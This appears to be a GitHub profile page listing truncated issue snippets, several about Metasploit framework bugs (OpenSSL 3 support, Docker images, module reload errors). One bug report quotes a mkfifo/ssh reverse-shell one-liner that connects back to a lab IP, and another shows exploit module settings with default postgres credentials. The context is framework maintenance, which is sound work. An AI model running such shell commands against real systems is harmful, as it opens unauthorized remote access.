adfoster-r7

Results 43 issues of adfoster-r7

It would be great to add support for automatically commenting on a PR/issues when specific labels are added by maintainers. There's a great Github action that shows how this could...

**Is your feature request related to a problem? Please describe.** just-the-docs currently supports `nav_order` metadata: > The parameter values can be numbers (integers, floats) and/or strings. When you omit nav_order...

enhancement
status: ready to implement

Hi there, thanks for gh-polls! It looks like the gh-polls cert has expired a week or so ago and security warnings are shown to the user: I'm not sure if...

No need to review, just testing CI's sanity tests

### Before The ssh client connects: ``` rm -rf /tmp/tqld ; mkfifo /tmp/tqld;ssh -qq -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 192.168.123.1 -p 5000 0/t mp/tqld 2>&1;rm /tmp/tqld ``` The msf handler hangs...

## Description OpenSSL3 is now released which is not fully supported by Metasploit. Let's update our library dependencies and most popular modules to work with OpenSSL 3. ## Steps to...

bug
openssl3

## Steps to reproduce As reported by @rasheed-rd in https://github.com/rapid7/metasploit-framework/pull/16812#issuecomment-1194304318 - the current dockerhub version of metasploit-framework 6.0.55 and the latest is released version is 6.2.8. The last update was...

bug
confirmed

Closes https://github.com/rapid7/metasploit-framework/issues/11341 Before the module would crash: ![image](https://user-images.githubusercontent.com/60357436/177367846-f242d102-96c5-4ba2-ac2c-ab0c4e86c986.png) Now we should log the error and continue ## Verification **Verify** The module can run against a server that doesn't respond: ```...

rn-enhancement

## Steps to reproduce ``` msf6 payload(python/meterpreter_reverse_http) > reload [*] Reloading module... [-] Failed to reload: undefined method `loader' for Object:Class ``` ### Version ``` msf6 payload(python/meterpreter_reverse_http) > version Framework:...

bug
confirmed

Spotted as part of https://github.com/rapid7/metasploit-framework/issues/15557 ### Before When the user uses the following options: ``` use exploit/linux/postgres/postgres_payload set username postgres set password postgres set rhost 192.168.123.6 set rport 5432 set...